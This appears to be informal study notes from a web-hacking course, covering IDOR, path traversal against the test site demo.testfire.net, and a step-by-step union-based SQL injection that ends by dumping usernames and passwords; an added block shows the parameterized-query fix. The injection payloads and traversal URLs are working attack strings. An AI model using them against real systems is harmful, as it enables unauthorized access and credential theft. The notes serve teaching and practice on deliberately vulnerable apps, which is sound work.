- Insecure Direct Object Reference
- ================================
- Directly accessing unsecured files, configurations and settings, where the access is neither authorized nor validated by the administrator.
- home ---> www.bankudao.com/...../php?id=home
- user profile --> www.bankudao.com/...../php?id=user_profile
- profile setting ---> www.bankudao.com/...../php?id=profile_setting
- www.facebook.com/sidigudiluv/....?id=AviTathgur
- www.facebook.com/sidigudiluv/....?id=YashTathgur
- www.facebook.com/AviTathgur
- Pages which a normal user is not allowed to go to.
- www.bankudalo.com/user+profile
- /../settings/config.html
- site: demo.testfire.net ---> test
- lucideus --> testphp.vulnweb
- IBM appscan
- http://demo.testfire.net/default.aspx?content=personal_deposit.htm
- http://demo.testfire.net/default.aspx?content=../default.aspx.cs%00.html
- Sensitive Data Exposure
- =======================
- Our sensitive data being shown to everyone.
- 1. userid and password
- 2. Personal Information --> Address, Phone number, SSN
- 3. Banking Information --> Account Number, Card Number, Black money
- 4. Health Information --> insurance
- With this information we can even bankrupt Donald Trump, Bill Gates, Mark Zx,xmxmxm
- 1. Weak Security Configuration --> SQL Injection, intercepting
- 2. Weak Cryptography --> SQL Injection
- DVWA --> Damn Vulnerable Web Application
- ========================================
- Vulnerable application by default ---> for testing an application's security ---> very easily hackable
- 5 Phases of Hacking
- ===================
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Clearing Tracks
- SQL --> Structured Query Language
- =================================
- User to database interaction ----
- IRCTC ----> Book Tickets
- Login id, Password
- Date, Location, Destination
- SELECT trains FROM database WHERE date="" AND location="" AND destination=""
- It is a database programming language in which we communicate with the database in the form of a query.
- ticket counter ---> query ---> some command on the computer ---> enter ---> command ---> database ---> answer
- SQL Injection
- =============
- Queries which are harmful and can return juicy data from the database ----> I fire some query... the result is username and password
- select username, password from IrctcDatabase;
- SQL Injection --> UNION BASED
- 1. To find the GET method
- something=something
- php?id=1
- php?cat=34
- php?cat=miaKhalifa
- php?sunny=khalifa
- 2. To check the vulnerability
- id=1'
- It will give me an error, which confirms that the site is vulnerable to SQL injection.
- 3. Now I will check the number of columns in the database
- order by 1--+
- order by 2--+
- order by 3--+
- 4. I will ask it to merge all the columns and show the data to me
- union select all 1,2--
- 5. Now I will check the version and database of the website
- union select all 1,version()-- ----> for checking the version
- union select all 1,database()-- ----> for checking the database
- 6. Let's call the mother of the database ---> information_schema
- union all select 1, table_name from information_schema.tables--
- we will get the list of all the tables present inside the database
- 7. Now I will explore the particular table ---> users
- union all select 1, column_name from information_schema.columns where table_name="users"--
- user_id, first_name, last_name,user,password
- 8. Now I will exploit the final table of the users
- union all select 1, group_concat(user_id, first_name, last_name, user, password) from users--
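The fix for the steps above, as an added example that is not part of the original notes: the same id lookup built by string concatenation and with a bound parameter, run against the inputs from steps 1, 2 and 4. Python with sqlite3, the function names and the sample row are assumptions made for illustration; the column names are the ones listed in step 7.

```python
import sqlite3

def make_db():
    # Constructed sample data; column names are the ones listed in step 7.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Test', 'User', 'tuser', 'constructed-hash')")
    return db

def lookup_concat(db, raw_id):
    # Before: the id value becomes part of the SQL text and is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_param(db, raw_id):
    # After: the SQL text is fixed; the id value is bound as data only.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def probe(fn, db, raw_id):
    # Report rows, or the class of database error that step 2 relies on seeing.
    try:
        return fn(db, raw_id)
    except sqlite3.Error as exc:
        return "error: " + type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from steps 1, 2 and 4 of the notes.
    for raw_id in ("1", "1'", "1 union select all 1,2--"):
        print(repr(raw_id))
        print("  concatenated: ", probe(lookup_concat, db, raw_id))
        print("  parameterized:", probe(lookup_param, db, raw_id))
```

With concatenation the step 2 input raises a database error and the step 4 input adds a row of caller-chosen values to the result; with the bound parameter both inputs are compared as plain data and match no row.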